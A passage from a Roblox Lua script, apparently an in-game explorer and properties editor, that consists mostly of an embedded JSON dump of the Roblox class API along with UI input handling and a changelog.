HoldingCtrl = true end if key.KeyCode == Enum.KeyCode.LeftShift then HoldingShift = true end end) Input.InputEnded:connect(function(key) if key.KeyCode == Enum.KeyCode.LeftControl then HoldingCtrl = false end if key.KeyCode == Enum.KeyCode.LeftShift then HoldingShift = false end end) while RbxApi == nil do RbxApi = GetApiRemote:Invoke() wait() end explorerFilter.Changed:connect(function(prop) if prop == "Text" then rawUpdateList() end end) CurrentInsertObjectWindow = CreateInsertObjectMenu( GetClasses(), "", false, function(option) CurrentInsertObjectWindow.Visible = false local list = SelectionVar():Get() for i = 1,#list do pcall(function() Instance.new(option,list[i]) end) end DestroyRightClick() end ) end) spawn(function() --[[ Change log: 09/18 Fixed checkbox mouseover sprite Encapsulated checkbox creation into separate method Fixed another checkbox issue 09/15 Invalid input is ignored instead of setting to default of that data type Consolidated control methods and simplified them All input goes through ToValue method Fixed position of BrickColor palette Made DropDown appear above row if it would otherwise exceed the page height Cleaned up stylesheets 09/14 Made properties window scroll when mouse wheel scrolled Object/Instance and Color3 data types handled properly Multiple BrickColor controls interfering with each other fixed Added support for Content data type --]] wait(0.2) local print = function(s) print(tostring(s)) end -- Services local Teams = game:GetService("Teams") local Workspace = game:GetService("Workspace") local Debris = game:GetService("Debris") local ContentProvider = game:GetService("ContentProvider") local Players = game:GetService("Players") local ReplicatedStorage = game:GetService("ReplicatedStorage") -- Functions function httpGet(url) return game:HttpGet(url,true) end -- RbxApi Stuff local apiUrl = "http://anaminus.github.io/rbx/json/api/latest.json" local maxChunkSize = 100 * 1000 local ApiJson if script:FindFirstChild("RawApiJson") then ApiJson = script.RawApiJson else ApiJson = "" end function getLocalApiJson() local rawApiJson = [===[ [{"Superclass":null,"type":"Class","Name":"Instance","tags":["notbrowsable"]},{"ValueType":"bool","type":"Property","Name":"Archivable","tags":[],"Class":"Instance"},{"ValueType":"string","type":"Property","Name":"ClassName","tags":["readonly"],"Class":"Instance"},{"ValueType":"int","type":"Property","Name":"DataCost","tags":["RobloxPlaceSecurity","readonly"],"Class":"Instance"},{"ValueType":"string","type":"Property","Name":"Name","tags":[],"Class":"Instance"},{"ValueType":"Object","type":"Property","Name":"Parent","tags":[],"Class":"Instance"},{"ValueType":"bool","type":"Property","Name":"RobloxLocked","tags":["PluginSecurity"],"Class":"Instance"},{"ValueType":"bool","type":"Property","Name":"archivable","tags":["hidden"],"Class":"Instance"},{"ValueType":"string","type":"Property","Name":"className","tags":["deprecated","readonly"],"Class":"Instance"},{"ReturnType":"void","Arguments":[],"Name":"ClearAllChildren","tags":[],"Class":"Instance","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"Clone","tags":[],"Class":"Instance","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Destroy","tags":[],"Class":"Instance","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"name","Default":null},{"Type":"bool","Name":"recursive","Default":"false"}],"Name":"FindFirstChild","tags":[],"Class":"Instance","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"GetChildren","tags":[],"Class":"Instance","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"int","Name":"scopeLength","Default":"4"}],"Name":"GetDebugId","tags":["PluginSecurity","notbrowsable"],"Class":"Instance","type":"Function"},{"ReturnType":"string","Arguments":[],"Name":"GetFullName","tags":[],"Class":"Instance","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"string","Name":"className","Default":null}],"Name":"IsA","tags":[],"Class":"Instance","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"Instance","Name":"descendant","Default":null}],"Name":"IsAncestorOf","tags":[],"Class":"Instance","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"Instance","Name":"ancestor","Default":null}],"Name":"IsDescendantOf","tags":[],"Class":"Instance","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Remove","tags":["deprecated"],"Class":"Instance","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"children","tags":["deprecated"],"Class":"Instance","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"clone","tags":["deprecated"],"Class":"Instance","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"destroy","tags":["deprecated"],"Class":"Instance","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"name","Default":null},{"Type":"bool","Name":"recursive","Default":"false"}],"Name":"findFirstChild","tags":["deprecated"],"Class":"Instance","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"getChildren","tags":["deprecated"],"Class":"Instance","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"string","Name":"className","Default":null}],"Name":"isA","tags":["deprecated"],"Class":"Instance","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"Instance","Name":"ancestor","Default":null}],"Name":"isDescendantOf","tags":["deprecated"],"Class":"Instance","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"remove","tags":["deprecated"],"Class":"Instance","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"childName","Default":null}],"Name":"WaitForChild","tags":[],"Class":"Instance","type":"YieldFunction"},{"Arguments":[{"Name":"child","Type":"Instance"},{"Name":"parent","Type":"Instance"}],"Name":"AncestryChanged","tags":[],"Class":"Instance","type":"Event"},{"Arguments":[{"Name":"property","Type":"Property"}],"Name":"Changed","tags":[],"Class":"Instance","type":"Event"},{"Arguments":[{"Name":"child","Type":"Instance"}],"Name":"ChildAdded","tags":[],"Class":"Instance","type":"Event"},{"Arguments":[{"Name":"child","Type":"Instance"}],"Name":"ChildRemoved","tags":[],"Class":"Instance","type":"Event"},{"Arguments":[{"Name":"descendant","Type":"Instance"}],"Name":"DescendantAdded","tags":[],"Class":"Instance","type":"Event"},{"Arguments":[{"Name":"descendant","Type":"Instance"}],"Name":"DescendantRemoving","tags":[],"Class":"Instance","type":"Event"},{"Arguments":[{"Name":"child","Type":"Instance"}],"Name":"childAdded","tags":["deprecated"],"Class":"Instance","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"Accoutrement","tags":[]},{"ValueType":"Vector3","type":"Property","Name":"AttachmentForward","tags":[],"Class":"Accoutrement"},{"ValueType":"CoordinateFrame","type":"Property","Name":"AttachmentPoint","tags":[],"Class":"Accoutrement"},{"ValueType":"Vector3","type":"Property","Name":"AttachmentPos","tags":[],"Class":"Accoutrement"},{"ValueType":"Vector3","type":"Property","Name":"AttachmentRight","tags":[],"Class":"Accoutrement"},{"ValueType":"Vector3","type":"Property","Name":"AttachmentUp","tags":[],"Class":"Accoutrement"},{"Superclass":"Accoutrement","type":"Class","Name":"Accessory","tags":[]},{"Superclass":"Accoutrement","type":"Class","Name":"Hat","tags":["deprecated"]},{"Superclass":"Instance","type":"Class","Name":"AdService","tags":["notCreatable"]},{"ReturnType":"void","Arguments":[],"Name":"ShowVideoAd","tags":[],"Class":"AdService","type":"Function"},{"Arguments":[{"Name":"adShown","Type":"bool"}],"Name":"VideoAdClosed","tags":[],"Class":"AdService","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"AdvancedDragger","tags":[]},{"Superclass":"Instance","type":"Class","Name":"Animation","tags":[]},{"ValueType":"Content","type":"Property","Name":"AnimationId","tags":[],"Class":"Animation"},{"Superclass":"Instance","type":"Class","Name":"AnimationController","tags":[]},{"ReturnType":"Array","Arguments":[],"Name":"GetPlayingAnimationTracks","tags":[],"Class":"AnimationController","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"Instance","Name":"animation","Default":null}],"Name":"LoadAnimation","tags":[],"Class":"AnimationController","type":"Function"},{"Arguments":[{"Name":"animationTrack","Type":"Instance"}],"Name":"AnimationPlayed","tags":[],"Class":"AnimationController","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"AnimationTrack","tags":[]},{"ValueType":"Object","type":"Property","Name":"Animation","tags":["readonly"],"Class":"AnimationTrack"},{"ValueType":"bool","type":"Property","Name":"IsPlaying","tags":["readonly"],"Class":"AnimationTrack"},{"ValueType":"float","type":"Property","Name":"Length","tags":["readonly"],"Class":"AnimationTrack"},{"ValueType":"AnimationPriority","type":"Property","Name":"Priority","tags":[],"Class":"AnimationTrack"},{"ValueType":"float","type":"Property","Name":"TimePosition","tags":[],"Class":"AnimationTrack"},{"ReturnType":"void","Arguments":[{"Type":"float","Name":"speed","Default":"1"}],"Name":"AdjustSpeed","tags":[],"Class":"AnimationTrack","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"float","Name":"weight","Default":"1"},{"Type":"float","Name":"fadeTime","Default":"0.100000001"}],"Name":"AdjustWeight","tags":[],"Class":"AnimationTrack","type":"Function"},{"ReturnType":"double","Arguments":[{"Type":"string","Name":"keyframeName","Default":null}],"Name":"GetTimeOfKeyframe","tags":[],"Class":"AnimationTrack","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"float","Name":"fadeTime","Default":"0.100000001"},{"Type":"float","Name":"weight","Default":"1"},{"Type":"float","Name":"speed","Default":"1"}],"Name":"Play","tags":[],"Class":"AnimationTrack","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"float","Name":"fadeTime","Default":"0.100000001"}],"Name":"Stop","tags":[],"Class":"AnimationTrack","type":"Function"},{"Arguments":[{"Name":"keyframeName","Type":"string"}],"Name":"KeyframeReached","tags":[],"Class":"AnimationTrack","type":"Event"},{"Arguments":[],"Name":"Stopped","tags":["deprecated"],"Class":"AnimationTrack","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"AnimationTrackState","tags":[]},{"Superclass":"Instance","type":"Class","Name":"Animator","tags":[]},{"ReturnType":"Instance","Arguments":[{"Type":"Instance","Name":"animation","Default":null}],"Name":"LoadAnimation","tags":[],"Class":"Animator","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"AssetService","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"revertUrl","Default":null}],"Name":"SetAssetRevertUrl","tags":["LocalUserSecurity"],"Class":"AssetService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"versionsUrl","Default":null}],"Name":"SetAssetVersionsUrl","tags":["LocalUserSecurity"],"Class":"AssetService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"accessUrl","Default":null}],"Name":"SetPlaceAccessUrl","tags":["LocalUserSecurity"],"Class":"AssetService","type":"Function"},{"ReturnType":"int","Arguments":[{"Type":"string","Name":"placeName","Default":null},{"Type":"int","Name":"templatePlaceID","Default":null},{"Type":"string","Name":"description","Default":""}],"Name":"CreatePlaceAsync","tags":[],"Class":"AssetService","type":"YieldFunction"},{"ReturnType":"int","Arguments":[{"Type":"Instance","Name":"player","Default":null},{"Type":"string","Name":"placeName","Default":null},{"Type":"int","Name":"templatePlaceID","Default":null},{"Type":"string","Name":"description","Default":""}],"Name":"CreatePlaceInPlayerInventoryAsync","tags":[],"Class":"AssetService","type":"YieldFunction"},{"ReturnType":"Dictionary","Arguments":[{"Type":"int","Name":"placeId","Default":null},{"Type":"int","Name":"pageNum","Default":"1"}],"Name":"GetAssetVersions","tags":[],"Class":"AssetService","type":"YieldFunction"},{"ReturnType":"int","Arguments":[{"Type":"int","Name":"creationID","Default":null}],"Name":"GetCreatorAssetID","tags":[],"Class":"AssetService","type":"YieldFunction"},{"ReturnType":"Instance","Arguments":[],"Name":"GetGamePlacesAsync","tags":[],"Class":"AssetService","type":"YieldFunction"},{"ReturnType":"Dictionary","Arguments":[{"Type":"int","Name":"placeId","Default":null}],"Name":"GetPlacePermissions","tags":[],"Class":"AssetService","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"placeId","Default":null},{"Type":"int","Name":"versionNumber","Default":null}],"Name":"RevertAsset","tags":[],"Class":"AssetService","type":"YieldFunction"},{"ReturnType":"void","Arguments":[],"Name":"SavePlaceAsync","tags":[],"Class":"AssetService","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"placeId","Default":null},{"Type":"AccessType","Name":"accessType","Default":"Everyone"},{"Type":"Array","Name":"inviteList","Default":"{}"}],"Name":"SetPlacePermissions","tags":[],"Class":"AssetService","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"Attachment","tags":[]},{"ValueType":"Vector3","type":"Property","Name":"Axis","tags":[],"Class":"Attachment"},{"ValueType":"CoordinateFrame","type":"Property","Name":"CFrame","tags":[],"Class":"Attachment"},{"ValueType":"Vector3","type":"Property","Name":"Position","tags":[],"Class":"Attachment"},{"ValueType":"Vector3","type":"Property","Name":"Rotation","tags":[],"Class":"Attachment"},{"ValueType":"Vector3","type":"Property","Name":"SecondaryAxis","tags":[],"Class":"Attachment"},{"ValueType":"Vector3","type":"Property","Name":"WorldAxis","tags":["readonly"],"Class":"Attachment"},{"ValueType":"Vector3","type":"Property","Name":"WorldPosition","tags":["readonly"],"Class":"Attachment"},{"ValueType":"Vector3","type":"Property","Name":"WorldRotation","tags":["readonly"],"Class":"Attachment"},{"ValueType":"Vector3","type":"Property","Name":"WorldSecondaryAxis","tags":["readonly"],"Class":"Attachment"},{"ReturnType":"Vector3","Arguments":[],"Name":"GetAxis","tags":[],"Class":"Attachment","type":"Function"},{"ReturnType":"Vector3","Arguments":[],"Name":"GetSecondaryAxis","tags":[],"Class":"Attachment","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector3","Name":"axis","Default":null}],"Name":"SetAxis","tags":[],"Class":"Attachment","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector3","Name":"axis","Default":null}],"Name":"SetSecondaryAxis","tags":[],"Class":"Attachment","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"BadgeService","tags":["notCreatable"]},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetAwardBadgeUrl","tags":["LocalUserSecurity"],"Class":"BadgeService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"seconds","Default":null}],"Name":"SetHasBadgeCooldown","tags":["LocalUserSecurity"],"Class":"BadgeService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetHasBadgeUrl","tags":["LocalUserSecurity"],"Class":"BadgeService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetIsBadgeDisabledUrl","tags":["LocalUserSecurity"],"Class":"BadgeService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetIsBadgeLegalUrl","tags":["LocalUserSecurity"],"Class":"BadgeService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"placeId","Default":null}],"Name":"SetPlaceId","tags":["LocalUserSecurity"],"Class":"BadgeService","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"userId","Default":null},{"Type":"int","Name":"badgeId","Default":null}],"Name":"AwardBadge","tags":[],"Class":"BadgeService","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"badgeId","Default":null}],"Name":"IsDisabled","tags":[],"Class":"BadgeService","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"badgeId","Default":null}],"Name":"IsLegal","tags":[],"Class":"BadgeService","type":"YieldFunction"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"userId","Default":null},{"Type":"int","Name":"badgeId","Default":null}],"Name":"UserHasBadge","tags":[],"Class":"BadgeService","type":"YieldFunction"},{"Arguments":[{"Name":"message","Type":"string"},{"Name":"userId","Type":"int"},{"Name":"badgeId","Type":"int"}],"Name":"BadgeAwarded","tags":["RobloxScriptSecurity"],"Class":"BadgeService","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"BasePlayerGui","tags":[]},{"Superclass":"BasePlayerGui","type":"Class","Name":"CoreGui","tags":["notCreatable","notbrowsable"]},{"ValueType":"Object","type":"Property","Name":"SelectionImageObject","tags":["RobloxScriptSecurity"],"Class":"CoreGui"},{"ValueType":"int","type":"Property","Name":"Version","tags":["readonly"],"Class":"CoreGui"},{"Superclass":"BasePlayerGui","type":"Class","Name":"PlayerGui","tags":["notCreatable"]},{"ValueType":"Object","type":"Property","Name":"SelectionImageObject","tags":[],"Class":"PlayerGui"},{"ReturnType":"float","Arguments":[],"Name":"GetTopbarTransparency","tags":[],"Class":"PlayerGui","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"float","Name":"transparency","Default":null}],"Name":"SetTopbarTransparency","tags":[],"Class":"PlayerGui","type":"Function"},{"Arguments":[{"Name":"transparency","Type":"float"}],"Name":"TopbarTransparencyChangedSignal","tags":[],"Class":"PlayerGui","type":"Event"},{"Superclass":"BasePlayerGui","type":"Class","Name":"StarterGui","tags":[]},{"ValueType":"bool","type":"Property","Name":"ResetPlayerGuiOnSpawn","tags":[],"Class":"StarterGui"},{"ValueType":"bool","type":"Property","Name":"ShowDevelopmentGui","tags":[],"Class":"StarterGui"},{"ReturnType":"bool","Arguments":[{"Type":"CoreGuiType","Name":"coreGuiType","Default":null}],"Name":"GetCoreGuiEnabled","tags":[],"Class":"StarterGui","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"parameterName","Default":null},{"Type":"Function","Name":"getFunction","Default":null}],"Name":"RegisterGetCore","tags":["RobloxScriptSecurity"],"Class":"StarterGui","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"parameterName","Default":null},{"Type":"Function","Name":"setFunction","Default":null}],"Name":"RegisterSetCore","tags":["RobloxScriptSecurity"],"Class":"StarterGui","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"parameterName","Default":null},{"Type":"Variant","Name":"value","Default":null}],"Name":"SetCore","tags":[],"Class":"StarterGui","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"CoreGuiType","Name":"coreGuiType","Default":null},{"Type":"bool","Name":"enabled","Default":null}],"Name":"SetCoreGuiEnabled","tags":[],"Class":"StarterGui","type":"Function"},{"ReturnType":"Variant","Arguments":[{"Type":"string","Name":"parameterName","Default":null}],"Name":"GetCore","tags":[],"Class":"StarterGui","type":"YieldFunction"},{"Arguments":[{"Name":"coreGuiType","Type":"CoreGuiType"},{"Name":"enabled","Type":"bool"}],"Name":"CoreGuiChangedSignal","tags":["RobloxScriptSecurity"],"Class":"StarterGui","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"BinaryStringValue","tags":[]},{"Superclass":"Instance","type":"Class","Name":"BindableEvent","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"Tuple","Name":"arguments","Default":null}],"Name":"Fire","tags":[],"Class":"BindableEvent","type":"Function"},{"Arguments":[{"Name":"arguments","Type":"Tuple"}],"Name":"Event","tags":[],"Class":"BindableEvent","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"BindableFunction","tags":[]},{"ReturnType":"Tuple","Arguments":[{"Type":"Tuple","Name":"arguments","Default":null}],"Name":"Invoke","tags":[],"Class":"BindableFunction","type":"YieldFunction"},{"ReturnType":"Tuple","Arguments":[{"Name":"arguments","Type":"Tuple"}],"Name":"OnInvoke","tags":[],"Class":"BindableFunction","type":"Callback"},{"Superclass":"Instance","type":"Class","Name":"BodyMover","tags":[]},{"Superclass":"BodyMover","type":"Class","Name":"BodyAngularVelocity","tags":[]},{"ValueType":"Vector3","type":"Property","Name":"AngularVelocity","tags":[],"Class":"BodyAngularVelocity"},{"ValueType":"Vector3","type":"Property","Name":"MaxTorque","tags":[],"Class":"BodyAngularVelocity"},{"ValueType":"float","type":"Property","Name":"P","tags":[],"Class":"BodyAngularVelocity"},{"ValueType":"Vector3","type":"Property","Name":"angularvelocity","tags":["deprecated"],"Class":"BodyAngularVelocity"},{"ValueType":"Vector3","type":"Property","Name":"maxTorque","tags":["deprecated"],"Class":"BodyAngularVelocity"},{"Superclass":"BodyMover","type":"Class","Name":"BodyForce","tags":[]},{"ValueType":"Vector3","type":"Property","Name":"Force","tags":[],"Class":"BodyForce"},{"ValueType":"Vector3","type":"Property","Name":"force","tags":["deprecated"],"Class":"BodyForce"},{"Superclass":"BodyMover","type":"Class","Name":"BodyGyro","tags":[]},{"ValueType":"CoordinateFrame","type":"Property","Name":"CFrame","tags":[],"Class":"BodyGyro"},{"ValueType":"float","type":"Property","Name":"D","tags":[],"Class":"BodyGyro"},{"ValueType":"Vector3","type":"Property","Name":"MaxTorque","tags":[],"Class":"BodyGyro"},{"ValueType":"float","type":"Property","Name":"P","tags":[],"Class":"BodyGyro"},{"ValueType":"CoordinateFrame","type":"Property","Name":"cframe","tags":["deprecated"],"Class":"BodyGyro"},{"ValueType":"Vector3","type":"Property","Name":"maxTorque","tags":["deprecated"],"Class":"BodyGyro"},{"Superclass":"BodyMover","type":"Class","Name":"BodyPosition","tags":[]},{"ValueType":"float","type":"Property","Name":"D","tags":[],"Class":"BodyPosition"},{"ValueType":"Vector3","type":"Property","Name":"MaxForce","tags":[],"Class":"BodyPosition"},{"ValueType":"float","type":"Property","Name":"P","tags":[],"Class":"BodyPosition"},{"ValueType":"Vector3","type":"Property","Name":"Position","tags":[],"Class":"BodyPosition"},{"ValueType":"Vector3","type":"Property","Name":"maxForce","tags":["deprecated"],"Class":"BodyPosition"},{"ValueType":"Vector3","type":"Property","Name":"position","tags":["deprecated"],"Class":"BodyPosition"},{"ReturnType":"Vector3","Arguments":[],"Name":"GetLastForce","tags":[],"Class":"BodyPosition","type":"Function"},{"ReturnType":"Vector3","Arguments":[],"Name":"lastForce","tags":["deprecated"],"Class":"BodyPosition","type":"Function"},{"Arguments":[],"Name":"ReachedTarget","tags":[],"Class":"BodyPosition","type":"Event"},{"Superclass":"BodyMover","type":"Class","Name":"BodyThrust","tags":[]},{"ValueType":"Vector3","type":"Property","Name":"Force","tags":[],"Class":"BodyThrust"},{"ValueType":"Vector3","type":"Property","Name":"Location","tags":[],"Class":"BodyThrust"},{"ValueType":"Vector3","type":"Property","Name":"force","tags":["deprecated"],"Class":"BodyThrust"},{"ValueType":"Vector3","type":"Property","Name":"location","tags":["deprecated"],"Class":"BodyThrust"},{"Superclass":"BodyMover","type":"Class","Name":"BodyVelocity","tags":[]},{"ValueType":"Vector3","type":"Property","Name":"MaxForce","tags":[],"Class":"BodyVelocity"},{"ValueType":"float","type":"Property","Name":"P","tags":[],"Class":"BodyVelocity"},{"ValueType":"Vector3","type":"Property","Name":"Velocity","tags":[],"Class":"BodyVelocity"},{"ValueType":"Vector3","type":"Property","Name":"maxForce","tags":["deprecated"],"Class":"BodyVelocity"},{"ValueType":"Vector3","type":"Property","Name":"velocity","tags":["deprecated"],"Class":"BodyVelocity"},{"ReturnType":"Vector3","Arguments":[],"Name":"GetLastForce","tags":[],"Class":"BodyVelocity","type":"Function"},{"ReturnType":"Vector3","Arguments":[],"Name":"lastForce","tags":[],"Class":"BodyVelocity","type":"Function"},{"Superclass":"BodyMover","type":"Class","Name":"RocketPropulsion","tags":[]},{"ValueType":"float","type":"Property","Name":"CartoonFactor","tags":[],"Class":"RocketPropulsion"},{"ValueType":"float","type":"Property","Name":"MaxSpeed","tags":[],"Class":"RocketPropulsion"},{"ValueType":"float","type":"Property","Name":"MaxThrust","tags":[],"Class":"RocketPropulsion"},{"ValueType":"Vector3","type":"Property","Name":"MaxTorque","tags":[],"Class":"RocketPropulsion"},{"ValueType":"Object","type":"Property","Name":"Target","tags":[],"Class":"RocketPropulsion"},{"ValueType":"Vector3","type":"Property","Name":"TargetOffset","tags":[],"Class":"RocketPropulsion"},{"ValueType":"float","type":"Property","Name":"TargetRadius","tags":[],"Class":"RocketPropulsion"},{"ValueType":"float","type":"Property","Name":"ThrustD","tags":[],"Class":"RocketPropulsion"},{"ValueType":"float","type":"Property","Name":"ThrustP","tags":[],"Class":"RocketPropulsion"},{"ValueType":"float","type":"Property","Name":"TurnD","tags":[],"Class":"RocketPropulsion"},{"ValueType":"float","type":"Property","Name":"TurnP","tags":[],"Class":"RocketPropulsion"},{"ReturnType":"void","Arguments":[],"Name":"Abort","tags":[],"Class":"RocketPropulsion","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Fire","tags":[],"Class":"RocketPropulsion","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"fire","tags":["deprecated"],"Class":"RocketPropulsion","type":"Function"},{"Arguments":[],"Name":"ReachedTarget","tags":[],"Class":"RocketPropulsion","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"BoolValue","tags":[]},{"ValueType":"bool","type":"Property","Name":"Value","tags":[],"Class":"BoolValue"},{"Arguments":[{"Name":"value","Type":"bool"}],"Name":"Changed","tags":[],"Class":"BoolValue","type":"Event"},{"Arguments":[{"Name":"value","Type":"bool"}],"Name":"changed","tags":["deprecated"],"Class":"BoolValue","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"BrickColorValue","tags":[]},{"ValueType":"BrickColor","type":"Property","Name":"Value","tags":[],"Class":"BrickColorValue"},{"Arguments":[{"Name":"value","Type":"BrickColor"}],"Name":"Changed","tags":[],"Class":"BrickColorValue","type":"Event"},{"Arguments":[{"Name":"value","Type":"BrickColor"}],"Name":"changed","tags":["deprecated"],"Class":"BrickColorValue","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"Button","tags":[]},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"active","Default":null}],"Name":"SetActive","tags":["PluginSecurity"],"Class":"Button","type":"Function"},{"Arguments":[],"Name":"Click","tags":["PluginSecurity"],"Class":"Button","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"CFrameValue","tags":[]},{"ValueType":"CoordinateFrame","type":"Property","Name":"Value","tags":[],"Class":"CFrameValue"},{"Arguments":[{"Name":"value","Type":"CoordinateFrame"}],"Name":"Changed","tags":[],"Class":"CFrameValue","type":"Event"},{"Arguments":[{"Name":"value","Type":"CoordinateFrame"}],"Name":"changed","tags":["deprecated"],"Class":"CFrameValue","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"CacheableContentProvider","tags":[]},{"Superclass":"CacheableContentProvider","type":"Class","Name":"MeshContentProvider","tags":[]},{"Superclass":"CacheableContentProvider","type":"Class","Name":"SolidModelContentProvider","tags":[]},{"Superclass":"CacheableContentProvider","type":"Class","Name":"TextureContentProvider","tags":[]},{"Superclass":"Instance","type":"Class","Name":"Camera","tags":[]},{"ValueType":"CoordinateFrame","type":"Property","Name":"CFrame","tags":[],"Class":"Camera"},{"ValueType":"Object","type":"Property","Name":"CameraSubject","tags":[],"Class":"Camera"},{"ValueType":"CameraType","type":"Property","Name":"CameraType","tags":[],"Class":"Camera"},{"ValueType":"CoordinateFrame","type":"Property","Name":"CoordinateFrame","tags":["deprecated","hidden"],"Class":"Camera"},{"ValueType":"float","type":"Property","Name":"FieldOfView","tags":[],"Class":"Camera"},{"ValueType":"CoordinateFrame","type":"Property","Name":"Focus","tags":[],"Class":"Camera"},{"ValueType":"bool","type":"Property","Name":"HeadLocked","tags":[],"Class":"Camera"},{"ValueType":"float","type":"Property","Name":"HeadScale","tags":[],"Class":"Camera"},{"ValueType":"Vector2","type":"Property","Name":"ViewportSize","tags":["readonly"],"Class":"Camera"},{"ValueType":"CoordinateFrame","type":"Property","Name":"focus","tags":["deprecated"],"Class":"Camera"},{"ReturnType":"float","Arguments":[],"Name":"GetPanSpeed","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"CoordinateFrame","Arguments":[],"Name":"GetRenderCFrame","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"float","Arguments":[],"Name":"GetRoll","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"float","Arguments":[],"Name":"GetTiltSpeed","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"CoordinateFrame","Name":"endPos","Default":null},{"Type":"CoordinateFrame","Name":"endFocus","Default":null},{"Type":"float","Name":"duration","Default":null}],"Name":"Interpolate","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"units","Default":null}],"Name":"PanUnits","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"Ray","Arguments":[{"Type":"float","Name":"x","Default":null},{"Type":"float","Name":"y","Default":null},{"Type":"float","Name":"depth","Default":"0"}],"Name":"ScreenPointToRay","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"CameraPanMode","Name":"mode","Default":"Classic"}],"Name":"SetCameraPanMode","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"float","Name":"rollAngle","Default":null}],"Name":"SetRoll","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"units","Default":null}],"Name":"TiltUnits","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"Ray","Arguments":[{"Type":"float","Name":"x","Default":null},{"Type":"float","Name":"y","Default":null},{"Type":"float","Name":"depth","Default":"0"}],"Name":"ViewportPointToRay","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"Vector3","Name":"worldPoint","Default":null}],"Name":"WorldToScreenPoint","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"Vector3","Name":"worldPoint","Default":null}],"Name":"WorldToViewportPoint","tags":[],"Class":"Camera","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"float","Name":"distance","Default":null}],"Name":"Zoom","tags":["RobloxScriptSecurity"],"Class":"Camera","type":"Function"},{"Arguments":[{"Name":"entering","Type":"bool"}],"Name":"FirstPersonTransition","tags":["RobloxPlaceSecurity"],"Class":"Camera","type":"Event"},{"Arguments":[],"Name":"InterpolationFinished","tags":[],"Class":"Camera","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"ChangeHistoryService","tags":["notCreatable"]},{"ReturnType":"Tuple","Arguments":[],"Name":"GetCanRedo","tag